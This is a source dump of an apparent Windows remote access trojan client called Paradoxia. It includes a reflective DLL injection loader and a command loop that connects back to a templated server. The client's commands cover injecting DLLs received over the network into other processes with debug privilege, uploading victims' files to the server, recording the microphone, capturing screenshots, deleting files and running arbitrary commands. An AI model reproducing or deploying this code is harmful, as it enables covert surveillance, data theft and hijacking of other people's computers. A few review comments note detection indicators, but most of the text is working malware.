// In-process variant. Flips [lpBuffer, lpBuffer + dwLength) to RWX, calls the image's
// ReflectiveLoader on the current thread, asks the DllMain it returns for the loaded module's
// HMODULE via DLL_QUERY_HMODULE, then restores the previous page protection.
//   lpBuffer - raw DLL image; dwLength - its size in bytes.
// Returns the loaded module's HMODULE, or NULL if the arguments are empty, the image has no
// ReflectiveLoader, VirtualProtect fails, the loader/DllMain report failure, or an exception
// is raised. REFLECTIVELOADER, DLLMAIN and DLL_QUERY_HMODULE come from ReflectiveDLLInjection.h
// (not shown here).
//
// NOTE(review): a private buffer made PAGE_EXECUTE_READWRITE and then executed from is the
// canonical in-memory-loading indicator; this is the transition a defender would alert on.
HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength )
{
	HMODULE hResult = NULL;
	DWORD dwReflectiveLoaderOffset = 0;
	DWORD dwOldProtect1 = 0;
	DWORD dwOldProtect2 = 0;
	REFLECTIVELOADER pReflectiveLoader = NULL;
	DLLMAIN pDllMain = NULL;

	if( lpBuffer == NULL || dwLength == 0 )
		return NULL;

	__try
	{
		// check if the library has a ReflectiveLoader...
		dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
		if( dwReflectiveLoaderOffset != 0 )
		{
			pReflectiveLoader = (REFLECTIVELOADER)((UINT_PTR)lpBuffer + dwReflectiveLoaderOffset);

			// we must VirtualProtect the buffer to RWX so we can execute the ReflectiveLoader...
			// this assumes lpBuffer is the base address of the region of pages and dwLength the size of the region
			if( VirtualProtect( lpBuffer, dwLength, PAGE_EXECUTE_READWRITE, &dwOldProtect1 ) )
			{
				// call the librarys ReflectiveLoader...
				pDllMain = (DLLMAIN)pReflectiveLoader();
				if( pDllMain != NULL )
				{
					// call the loaded librarys DllMain to get its HMODULE
					if( !pDllMain( NULL, DLL_QUERY_HMODULE, &hResult ) )
						hResult = NULL;
				}
				// revert to the previous protection flags... (return value deliberately ignored)
				VirtualProtect( lpBuffer, dwLength, dwOldProtect1, &dwOldProtect2 );
			}
		}
	}
	__except( EXCEPTION_EXECUTE_HANDLER )
	{
		// NOTE(review): if the fault happens after the first VirtualProtect, the buffer is left RWX
		hResult = NULL;
	}

	return hResult;
}
//===============================================================================================//
// Loads a PE image from memory into the address space of a host process via the image's exported ReflectiveLoader function
// Note: You must compile whatever you are injecting with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
//       defined in order to use the correct RDI prototypes.
// Note: The hProcess handle must have these access rights: PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
//       PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ
// Note: If you are passing in an lpParameter value, if it is a pointer, remember it is for a different address space.
// Note: This function currently cant inject accross architectures, but only to architectures which are the
//       same as the arch this function is compiled as, e.g.
//       x86->x86 and x64->x64 but not x64->x86 or x86->x64.
//
// Remote variant. Copies the raw image into hProcess (an RWX region from VirtualAllocEx, filled
// by WriteProcessMemory) and starts a thread there at base + ReflectiveLoader offset, with a
// 1 MiB stack and lpParameter as the thread argument.
//   hProcess    - target process handle with the rights listed above.
//   lpBuffer    - raw DLL image in THIS process; dwLength - its size in bytes.
//   lpParameter - value handed to the remote thread (a pointer here is meaningless there).
// Returns the new thread's handle (caller closes it), or NULL when any argument is missing, the
// image has no ReflectiveLoader, allocation/write/thread creation fails, or an exception occurs.
//
// NOTE(review): if WriteProcessMemory or CreateRemoteThread fails after VirtualAllocEx
// succeeded, the RWX region in the target is never freed (no VirtualFreeEx on the error path).
// bSuccess is assigned but never used.
// NOTE(review): VirtualAllocEx(RWX) + WriteProcessMemory + CreateRemoteThread into another
// process is the textbook remote-injection sequence that endpoint telemetry keys on.
HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter )
{
	BOOL bSuccess = FALSE;
	LPVOID lpRemoteLibraryBuffer = NULL;
	LPTHREAD_START_ROUTINE lpReflectiveLoader = NULL;
	HANDLE hThread = NULL;
	DWORD dwReflectiveLoaderOffset = 0;
	DWORD dwThreadId = 0;

	__try
	{
		// single-iteration do/while so any failure can "break" straight to the return
		do
		{
			if( !hProcess || !lpBuffer || !dwLength )
				break;

			// check if the library has a ReflectiveLoader...
			dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
			if( !dwReflectiveLoaderOffset )
				break;

			// alloc memory (RWX) in the host process for the image...
			lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
			if( !lpRemoteLibraryBuffer )
				break;

			// write the image into the host process...
			if( !WriteProcessMemory( hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL ) )
				break;

			// add the offset to ReflectiveLoader() to the remote library address...
			lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset );

			// create a remote thread in the host process to call the ReflectiveLoader!
			hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId );

		} while( 0 );

	}
	__except( EXCEPTION_EXECUTE_HANDLER )
	{
		hThread = NULL;
	}

	return hThread;
}
//===============================================================================================//
--------------------------------------------------------------------------------
/ParadoxiaClient/ParadoxiaClient/LoadLibraryR.h:
--------------------------------------------------------------------------------
//===============================================================================================//
// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
//     * Redistributions of source code must retain the above copyright notice, this list of
//       conditions and the following disclaimer.
//
//     * Redistributions in binary form must reproduce the above copyright notice, this list of
//       conditions and the following disclaimer in the documentation and/or other materials provided
//       with the distribution.
//
//     * Neither the name of Harmony Security nor the names of its contributors may be used to
//       endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 26 | // POSSIBILITY OF SUCH DAMAGE. 27 | //===============================================================================================// 28 | #ifndef _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H 29 | #define _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H 30 | //===============================================================================================// 31 | #include "ReflectiveDLLInjection.h" 32 | #ifdef __MINGW32__ 33 | #define __try 34 | #define __except(x) if(0) 35 | #endif 36 | 37 | DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer ); 38 | 39 | HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength ); 40 | 41 | HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter ); 42 | 43 | //===============================================================================================// 44 | #endif 45 | //===============================================================================================// 46 | -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/ParadoxiaClient.c: -------------------------------------------------------------------------------- 1 | /* 2 | Author: Fahad (QuantumCore) 3 | connect.c (c) 2020 4 | Created: 2020-08-15T15:27:04.427Z 5 | Modified: - 6 | */ 7 | 8 | /* 9 | Have a good time reading the source. You're an amazing person. 10 | If you decide to copy, Don't forget to give me credit. 
11 | */ 12 | 13 | 14 | #include "paradoxia.h" 15 | #include "LoadLibraryR.h" 16 | 17 | 18 | char recvbuf[BUFFER]; 19 | 20 | int fsize = 0; 21 | char* fileinfo[3]; 22 | char temp[BUFFER]; // Temporary buffer to receive file information 23 | 24 | struct sockaddr_in server; 25 | SOCKET sockfd; 26 | 27 | TOKEN_PRIVILEGES priv = { 0 }; 28 | HANDLE hModule = NULL; 29 | HANDLE hProcess = NULL; 30 | HANDLE hToken = NULL; 31 | 32 | 33 | #define BREAK_WITH_ERROR( e ) { sockprintf( "[-] %s. Error=%ld", e, GetLastError() ); break; } 34 | 35 | 36 | // By @augustgl (github.com/augustgl) 37 | void sockprintf(const char* words, ...) { 38 | static char textBuffer[BUFFER]; 39 | memset(textBuffer, '\0', BUFFER); 40 | va_list args; 41 | va_start(args, words); 42 | vsprintf(textBuffer, words, args); 43 | va_end(args); 44 | sockSend(textBuffer); 45 | // return send(sock, textBuffer, strlen(textBuffer), 0); // see, it's printf but for a socket. instead of printing, at the end it's a send() 46 | } 47 | 48 | void REConnect(void) 49 | { 50 | closesocket(sockfd); 51 | WSACleanup(); 52 | Sleep(2000); 53 | MainConnect(); 54 | } 55 | 56 | void sockSend(const char* data) 57 | { 58 | int lerror = WSAGetLastError(); 59 | int totalsent = 0; 60 | int buflen = strlen(data); 61 | while (buflen > totalsent) { 62 | int r = send(sockfd, data + totalsent, buflen - totalsent, 0); 63 | if (lerror == WSAECONNRESET) 64 | { 65 | connected = FALSE; 66 | } 67 | if (r < 0) return; 68 | totalsent += r; 69 | } 70 | return; 71 | } 72 | 73 | void paradoxia_main(void) 74 | { 75 | while (connected) 76 | { 77 | Sleep(100); 78 | memset(recvbuf, '\0', BUFFER); 79 | int return_code = recv(sockfd, recvbuf, BUFFER, 0); 80 | if (return_code == SOCKET_ERROR && WSAGetLastError() == WSAECONNRESET) 81 | { 82 | connected = FALSE; 83 | } 84 | 85 | if (strcmp(recvbuf, "frecv") == 0) // frecv (file recv) / recv file from server 86 | { 87 | 88 | int expected = 0; // expected bytes of size 89 | DWORD dwBytesWritten = 0; // number of 
bytes written 90 | BOOL write; // Return value of WriteFile(); 91 | memset(temp, '\0', BUFFER); // Clear temp 92 | memset(fileinfo, '\0', 2); 93 | int return_code = recv(sockfd, temp, BUFFER, 0); // Receive File information from server (filename:filesize) 94 | if (return_code == SOCKET_ERROR && WSAGetLastError() == WSAECONNRESET) 95 | { 96 | connected = FALSE; 97 | } 98 | split(temp, fileinfo, ":"); // split the received string with ':' delimeter. So at index 0, There is filename, And at index 1, There is filesize. 99 | expected = atoi(fileinfo[1]); // Convert filesize to integer. Filesize is the expected file size. 100 | // Create file. 101 | HANDLE recvfile = CreateFile(fileinfo[0], FILE_APPEND_DATA, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 102 | if (recvfile == INVALID_HANDLE_VALUE) { 103 | sockprintf( "[Error Creating File] : %ld", GetLastError()); 104 | } 105 | else { 106 | memset(recvbuf, '\0', BUFFER); // Clear main buffer 107 | int total = 0; // Total bytes received 108 | 109 | do { // IF Total is equal to expected bytes. Break the loop, And stop receiving. 110 | fsize = recv(sockfd, recvbuf, BUFFER, 0); // Receive file 111 | if (fsize == SOCKET_ERROR && WSAGetLastError() == WSAECONNRESET) 112 | { 113 | connected = FALSE; 114 | printf("[X] Connection interrupted while receiving file %s for %s size.", fileinfo[0], fileinfo[1]); 115 | } 116 | else if (fsize == 0) { 117 | break; 118 | } 119 | else { 120 | write = WriteFile(recvfile, recvbuf, fsize, &dwBytesWritten, NULL); // Write file data to file 121 | total += fsize; // Add number of bytes received to total. 
122 | } 123 | } while (total != expected); 124 | 125 | if (write == FALSE) 126 | { 127 | sockprintf( "[Error Writing file %s of %s size] Error : %ld.", fileinfo[0], fileinfo[1], GetLastError()); 128 | } 129 | else { 130 | // sockprintf( "\n[ Received File : %s ]\n[ File Size : %s bytes ]\n[ Bytes written : %ld ]\n", fileinfo[0], fileinfo[1], dwBytesWritten); 131 | // sockprintf( "\n[ Saved File : %s ]\n[ File Size : %i bytes ]\n", fileinfo[0], total); 132 | sockprintf( 133 | 134 | "F_OK,%s,%i,%s\\%s", 135 | fileinfo[0], 136 | total, 137 | cDir(), 138 | fileinfo[0] 139 | ); 140 | } 141 | CloseHandle(recvfile); 142 | } 143 | } 144 | // Reflective DLL Injection over socket 145 | else if (strcmp(recvbuf, "fdll") == 0) 146 | { 147 | DWORD dwProcessId; 148 | memset(temp, '\0', BUFFER); 149 | int return_code = recv(sockfd, temp, BUFFER, 0); 150 | if (return_code == SOCKET_ERROR && WSAGetLastError() == WSAECONNRESET) 151 | { 152 | break; 153 | } 154 | split(temp, fileinfo, ":"); 155 | int expected = atoi(fileinfo[1]); 156 | if (strcmp(fileinfo[2], "None") == 0) { 157 | dwProcessId = GetCurrentProcessId(); 158 | } 159 | else { 160 | dwProcessId = ProcessId(fileinfo[2]); 161 | } 162 | 163 | unsigned char* DLL = HeapAlloc(GetProcessHeap(), 0, expected + 1); 164 | 165 | memset(recvbuf, '\0', BUFFER); 166 | ZeroMemory(DLL, expected + 1); 167 | int total = 0; 168 | 169 | do { 170 | fsize = recv(sockfd, recvbuf, BUFFER, 0); 171 | if (fsize == SOCKET_ERROR && WSAGetLastError() == WSAECONNRESET) 172 | { 173 | connected = FALSE; 174 | // printf("[X] Connection interrupted while receiving DLL\n"); 175 | } 176 | else if (fsize == 0) { 177 | break; 178 | } 179 | else { 180 | memcpy(DLL + total, recvbuf, fsize); 181 | total += fsize; 182 | } 183 | } while (total != expected); 184 | 185 | do { 186 | if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) 187 | { 188 | priv.PrivilegeCount = 1; 189 | priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 
190 | 191 | if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid)) 192 | AdjustTokenPrivileges(hToken, FALSE, &priv, 0, NULL, NULL); 193 | 194 | CloseHandle(hToken); 195 | } 196 | 197 | hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, dwProcessId); 198 | if (!hProcess) 199 | BREAK_WITH_ERROR("Failed to open the target process"); 200 | 201 | hModule = LoadRemoteLibraryR(hProcess, DLL, expected + 1, NULL); 202 | if (!hModule) 203 | BREAK_WITH_ERROR("Failed to inject the DLL"); 204 | 205 | WaitForSingleObject(hModule, -1); 206 | sockprintf( "DLL_OK:%ld", dwProcessId); 207 | } while (0); 208 | 209 | if (DLL) 210 | { 211 | HeapFree(GetProcessHeap(), 0, DLL); 212 | 213 | } 214 | if (hProcess) 215 | { 216 | CloseHandle(hProcess); 217 | } 218 | 219 | } 220 | // Upload File to Server 221 | else if (strstr(recvbuf, "fupload") != NULL) 222 | { 223 | memset(fileinfo, '\0', 3); 224 | split(recvbuf, fileinfo, ":"); 225 | 226 | int bytes_read; 227 | BOOL upload = TRUE; 228 | FILE* fs; 229 | 230 | do { 231 | 232 | for (int i = 0; i < 2; i++) { 233 | if (*fileinfo[i] == '\0') 234 | { 235 | sockprintf( "[ Invalid File Download Request ]\n"); 236 | upload = FALSE; 237 | break; 238 | } 239 | } 240 | 241 | // I'm using fopen instead of GetFileSizeEx because this is much easier for me and this works 242 | // IF you'd like to update this, fork and make a pull request, I will happily accept 243 | if (upload) { 244 | if ((fs = fopen(fileinfo[1], "rb")) != NULL) 245 | { 246 | fseek(fs, 0L, SEEK_END); 247 | long filesize = ftell(fs); 248 | fseek(fs, 0, SEEK_SET); 249 | 250 | if (filesize <= 0) { 251 | sockprintf( "File '%s' is of 0 bytes.", fileinfo[1]); 252 | fclose(fs); 253 | upload = FALSE; 254 | break; 255 | } 256 | 257 | sockprintf( "FILE:%s:%ld", fileinfo[1], filesize); 258 | Sleep(1000); 259 | char fbuffer[500]; 260 | memset(fbuffer, '\0', 500); 261 | while (!feof(fs)) { 262 | 
if ((bytes_read = fread(&fbuffer, 1, 500, fs)) > 0) { 263 | send(sockfd, fbuffer, bytes_read, 0); 264 | } 265 | else { 266 | upload = FALSE; 267 | break; 268 | } 269 | } 270 | fclose(fs); 271 | } 272 | 273 | else { 274 | sockprintf( "[ Error Opening file %s (Error %ld) ]", fileinfo[1], GetLastError()); 275 | } 276 | } 277 | // important 278 | upload = FALSE; 279 | 280 | } while (upload); 281 | 282 | } 283 | // ======================================== 284 | else if (strcmp(recvbuf, "micstart") == 0) 285 | { 286 | mciSendString("open new type waveaudio alias paradoxia", NULL, 0, NULL); 287 | mciSendString("set prime time format ms", NULL, 0, NULL); 288 | mciSendString("record paradoxia notify", NULL, 0, NULL); 289 | sockprintf("[+] Now recording microphone."); 290 | } 291 | else if (strstr(recvbuf, "micstop") != NULL) 292 | { 293 | memset(fileinfo, '\0', 3); 294 | split(recvbuf, fileinfo, ":"); 295 | char filename[200]; 296 | memset(filename, '\0', 200); 297 | snprintf(filename, 200, "save paradoxia %s", fileinfo[1]); 298 | mciSendString("stop paradoxia", NULL, 0, NULL); 299 | mciSendString(filename, NULL, 0, NULL); 300 | mciSendString("close paradoxia", NULL, 0, NULL); 301 | } 302 | 303 | // send user / pc 304 | else if (strcmp(recvbuf, "host") == 0) 305 | { 306 | UserPC(); 307 | } 308 | 309 | else if (strcmp(recvbuf, "os") == 0) { 310 | OS(); 311 | } 312 | else if (strcmp(recvbuf, "processors") == 0) { 313 | SYSTEMINFO(0); 314 | } 315 | else if (strcmp(recvbuf, "pagesize") == 0) { 316 | SYSTEMINFO(1); 317 | } 318 | else if (strcmp(recvbuf, "minappaddr") == 0) { 319 | SYSTEMINFO(2); 320 | } 321 | else if (strcmp(recvbuf, "maxappaddr") == 0) { 322 | SYSTEMINFO(3); 323 | } 324 | 325 | else if (strcmp(recvbuf, "agent") == 0) { 326 | sockprintf( "%s", ParadoxiaInfo()); 327 | } 328 | 329 | else if (strcmp(recvbuf, "ramsize") == 0){ 330 | ramsize(1); 331 | } 332 | 333 | else if (strcmp(recvbuf, "vramsize") == 0) { 334 | ramsize(0); 335 | } 336 | // list files in current 
directory 337 | else if (strcmp(recvbuf, "listdir") == 0) 338 | { 339 | WIN32_FIND_DATA data; 340 | HANDLE hFind; 341 | hFind = FindFirstFile("*", &data); 342 | int i = 0; 343 | char dir[BUFFER]; 344 | if (hFind != INVALID_HANDLE_VALUE) 345 | { 346 | memset(dir, 0, BUFFER); 347 | snprintf(dir, BUFFER, "Listing '%s'\n-------------------\n", cDir()); 348 | do { 349 | int len = strlen(dir); 350 | if (data.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) { 351 | snprintf(dir + len, sizeof(dir) - len, "[DIRECTORY] %s\n", data.cFileName); 352 | } 353 | else { 354 | ULONGLONG FileSize = data.nFileSizeHigh; 355 | FileSize <<= sizeof(data.nFileSizeHigh) * 8; 356 | FileSize |= data.nFileSizeLow; 357 | snprintf(dir + len, sizeof(dir) - len, "[FILE] %s (%llu bytes)\n", data.cFileName, FileSize); 358 | } 359 | } while (FindNextFile(hFind, &data)); 360 | 361 | sockSend(dir); 362 | } 363 | } 364 | 365 | // change directory 366 | else if (strcmp(recvbuf, "cd") == 0) 367 | { 368 | memset(recvbuf, '\0', BUFFER); 369 | int return_code = recv(sockfd, recvbuf, BUFFER, 0); 370 | if (return_code == SOCKET_ERROR && WSAGetLastError() == WSAECONNRESET) 371 | { 372 | connected = FALSE; 373 | } 374 | 375 | if (!SetCurrentDirectory(recvbuf)) 376 | { 377 | int x = GetLastError(); // Should this be integer? 378 | // on line 22 I'm using %ld to print the error, it works, What?? 
379 | switch (x) { 380 | case 2: 381 | sockprintf( "Error Changing Directory, File or Folder not Found (Error code %i)", x); 382 | break; 383 | case 3: 384 | sockprintf( "Error Changing Directory, Path not found (Error Code %i)", x); 385 | break; 386 | case 5: 387 | sockprintf( "Error Changing Directory, Access Denied (Error Code %i)", x); 388 | break; 389 | default: 390 | sockprintf( "Error Changing Directory, Error %i", x); 391 | break; 392 | } 393 | } 394 | else { 395 | sockprintf( "Directory Changed to '%s'", cDir()); 396 | } 397 | } 398 | 399 | // delete file 400 | else if (strstr(recvbuf, "delete") != NULL) 401 | { 402 | memset(fileinfo, '\0', 3); 403 | split(recvbuf, fileinfo, ":"); 404 | if (isFile(fileinfo[1])) 405 | { 406 | if (DeleteFile(fileinfo[1])) 407 | { 408 | sockprintf( "DEL_OK,%s,%s", fileinfo[1], cDir()); 409 | } 410 | else { 411 | sockprintf( "Error Deleting file : %i", GetLastError()); 412 | } 413 | 414 | } 415 | else { 416 | sockprintf( "File '%s' does not exist.", fileinfo[1]); 417 | } 418 | } 419 | 420 | // kill 421 | else if (strcmp(recvbuf, "kill") == 0) 422 | { 423 | connected = FALSE; 424 | break; 425 | } 426 | 427 | else if(strcmp(recvbuf, "die") == 0) 428 | { 429 | sockprintf("Dying until next reboot.\n"); 430 | connected = FALSE; 431 | Sleep(2000); 432 | exit(0); // :D 433 | } 434 | 435 | // Capture screenshot 436 | else if (strcmp(recvbuf, "screenshot") == 0) { 437 | CaptureAnImage(GetDesktopWindow(), sockfd); 438 | } 439 | 440 | // Send process info 441 | else if (strstr(recvbuf, "psinfo") != NULL) 442 | { 443 | memset(fileinfo, '\0', 3); 444 | split(recvbuf, fileinfo, ":"); 445 | char FILEPATH[BUFFER]; 446 | memset(FILEPATH, '\0', BUFFER); 447 | DWORD pid = ProcessId(fileinfo[1]); 448 | HANDLE procHandle; 449 | if (pid != 0) 450 | { 451 | procHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid); 452 | if (procHandle != NULL) { 453 | if (GetModuleFileNameEx(procHandle, NULL, FILEPATH, MAX_PATH) != 0) 454 | 
{ 455 | // Send Process name, pid, and path back 456 | sockprintf( "PROCESS,%s,%ld,%s", fileinfo[1], pid, FILEPATH); 457 | } 458 | else { 459 | sockprintf( "PROCESS,%s,%ld,(error : %ld)", fileinfo[1], pid, GetLastError()); 460 | } 461 | CloseHandle(procHandle); 462 | } 463 | else { 464 | sockprintf( "Failed to open Process : %s", fileinfo[1]); 465 | } 466 | } 467 | else { 468 | sockprintf( "Process not running."); 469 | } 470 | } 471 | 472 | // Send admin status 473 | 474 | else if (strcmp(recvbuf, "isadmin") == 0) 475 | { 476 | if (IsAdmin()) 477 | { 478 | sockprintf( "ADMIN:TRUE"); 479 | } 480 | else { 481 | sockprintf( "ADMIN:FALSE"); 482 | } 483 | 484 | } 485 | 486 | // Send WAN IP Address, last command 487 | 488 | else if (strcmp(recvbuf, "wanip") == 0) 489 | { 490 | char* wanip[BUFFER]; 491 | HINTERNET hInternet, hFile; 492 | DWORD rSize; 493 | if (InternetCheckConnection("http://www.google.com", 1, 0)) { 494 | memset(wanip, '\0', BUFFER); 495 | hInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0); 496 | hFile = InternetOpenUrl(hInternet, "https://myexternalip.com/raw", NULL, 0, INTERNET_FLAG_RELOAD, 0); // bot.whatsmyipaddress is down now. 
497 | // F 498 | InternetReadFile(hFile, &wanip, sizeof(wanip), &rSize); 499 | wanip[rSize] = '\0'; 500 | 501 | InternetCloseHandle(hFile); 502 | InternetCloseHandle(hInternet); 503 | sockprintf( "WANIP:%s", wanip); 504 | } 505 | else { 506 | sockprintf( "No Internet Connection detected."); 507 | } 508 | } 509 | 510 | else if (strcmp(recvbuf, "paradoxiapid") == 0) { 511 | sockprintf( "paradoxiaPID:%s", ParadoxiaInfo()); 512 | } 513 | 514 | 515 | else { 516 | ExecSock(sockfd, recvbuf); 517 | } 518 | 519 | } 520 | 521 | if (!connected) 522 | { 523 | REConnect(); 524 | } 525 | } 526 | 527 | void StartWSA(void) 528 | { 529 | WSADATA wsa; 530 | if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) 531 | { 532 | printf("[Error] Error Starting Winsock."); 533 | WSAReportError(); 534 | } 535 | } 536 | 537 | 538 | void MainConnect(void) 539 | { 540 | StartWSA(); 541 | sockfd = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0); 542 | if (sockfd == SOCKET_ERROR || sockfd == INVALID_SOCKET) 543 | { 544 | printf("Socket Creation Error. 
"); 545 | 546 | WSAReportError(); 547 | exit(1); 548 | } 549 | 550 | server.sin_addr.s_addr = inet_addr("{{serverhost}}"); 551 | server.sin_port = htons({{serverport}}); 552 | server.sin_family = AF_INET; 553 | 554 | do { 555 | if (connect(sockfd, (struct sockaddr*)&server, sizeof(server)) == SOCKET_ERROR) { 556 | REConnect(); 557 | } 558 | else { 559 | connected = TRUE; 560 | } 561 | } while (!connected); 562 | 563 | paradoxia_main(); 564 | } 565 | -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/ParadoxiaClient.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 16.0 37 | Win32Proj 38 | {bc18ae1e-dddd-4039-9eec-91b2d35af740} 39 | ParadoxiaClient 40 | 10.0 41 | 42 | 43 | 44 | Application 45 | true 46 | v142 47 | Unicode 48 | 49 | 50 | Application 51 | false 52 | v142 53 | true 54 | Unicode 55 | 56 | 57 | Application 58 | true 59 | v142 60 | Unicode 61 | 62 | 63 | Application 64 | false 65 | v142 66 | true 67 | Unicode 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | true 89 | 90 | 91 | false 92 | 93 | 94 | true 95 | 96 | 97 | false 98 | 99 | 100 | 101 | Level3 102 | true 103 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | 110 | 111 | 112 | 113 | Level3 114 | true 115 | true 116 | true 117 | _CRT_SECURE_NO_WARNINGS;_WINSOCK_DEPRECATED_NO_WARNINGS 118 | true 119 | 120 | 121 | Console 122 | true 123 | true 124 | true 125 | 126 | 127 | 128 | 129 | Level3 130 | true 131 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 132 | true 133 | 134 | 135 | Console 136 | true 137 | 138 | 139 | 140 | 141 | Level3 142 | true 143 | true 144 | true 145 | 
_CRT_SECURE_NO_WARNINGS;_WINSOCK_DEPRECATED_NO_WARNINGS 146 | true 147 | 148 | 149 | Console 150 | true 151 | true 152 | true 153 | 154 | 155 | 156 | 157 | 158 | -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/ParadoxiaClient.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | Source Files 29 | 30 | 31 | Source Files 32 | 33 | 34 | Source Files 35 | 36 | 37 | 38 | 39 | Header Files 40 | 41 | 42 | Header Files 43 | 44 | 45 | Header Files 46 | 47 | 48 | Header Files 49 | 50 | 51 | -------------------------------------------------------------------------------- /ParadoxiaClient/ParadoxiaClient/ReflectiveDLLInjection.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 3 | // All rights reserved. 4 | // 5 | // Redistribution and use in source and binary forms, with or without modification, are permitted 6 | // provided that the following conditions are met: 7 | // 8 | // * Redistributions of source code must retain the above copyright notice, this list of 9 | // conditions and the following disclaimer. 
10 | // 11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of 12 | // conditions and the following disclaimer in the documentation and/or other materials provided 13 | // with the distribution. 14 | // 15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to 16 | // endorse or promote products derived from this software without specific prior written permission. 17 | // 18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 